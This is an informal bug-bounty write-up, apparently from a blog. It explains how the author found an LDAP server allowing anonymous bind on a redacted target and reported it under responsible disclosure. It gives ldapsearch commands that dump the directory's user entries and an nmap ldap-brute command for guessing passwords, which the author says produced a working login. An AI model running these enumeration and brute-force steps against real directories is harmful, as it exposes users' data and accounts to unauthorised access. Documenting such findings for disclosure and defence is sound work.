How to Takover a ldap server.
Intro
LDAP (Lightweight Directory Access Protocol) is a software protocol for enabling anyone to locate organizations, individuals, and other resources such as files and devices in a network, whether on the public Internet or on a corporate intranet. — read here
I Chose a random paying target REDACTED.com running a Responsible Disclosure.
As Usual i started my personal tool “BREXET” and it gathered lots of subdomains and ran nmap over every subdomain , i went through the output and found this interesting port 389 with anonymous bind enabled.
can be found using shodan , use shodan query — ssl:target Port:”389"
Anonymous LDAP Binding allows a client to connect and search the directory (bind and search) without logging in. You do not need to include binddn and bindpasswd.
Now, we can try searching for the base by using a ldap search query.
ldapsearch -h <TARGET IP> 389 -x -s base -b ‘’ “(objectClass=*)” “*” +
now , take a note of naming context/base ,with this we can enum ldap users and their access details and uids , etc
defaultnamingcontext: dc=xxx,dc=xxx,dc=xx
we are gonna use this command.
ldapsearch -h <TARGET IP> -p 389 -x -b “dc=xxx,dc=xxx,dc=xx”
now there were lots of users and here’s how their ldap detail look like
# aab, users, compat, doman_name
dn: uid=aab,cn=users,cn=compat,dc=xxx,dc=xxx,dc=xx
objectClass: posixAccount
objectClass: ipaOverrideTarget
objectClass: top
gecos: name_here
cn: name_here
uidNumber: 1019XXXXXXX
gidNumber: 1019XXXXXXX
loginShell: /bin/bash
homeDirectory: /home/aab
ipaAnchorUUID:: xxxxxxxxx
uid: aab
now with this as a attacker i can try bruteforcing passwords or can check for usernames and password with a default list using nmap
nmap -p 389 — script ldap-brute — script-args ldap.base=’”dc=xxx,dc=xxxx,dc=xx”’ <target ip>
#Note: You can use jxplorer to do the same , just connect to the port using it .
#Note: do nmap scan on all subs if the target scope is big.
with this i got lucky and got a ldap user cred (thanks to nmap)
once you get access use jxplorer to play around .
after reporting it , i earned good bounty.
#if you have any question just DM on my twitter.
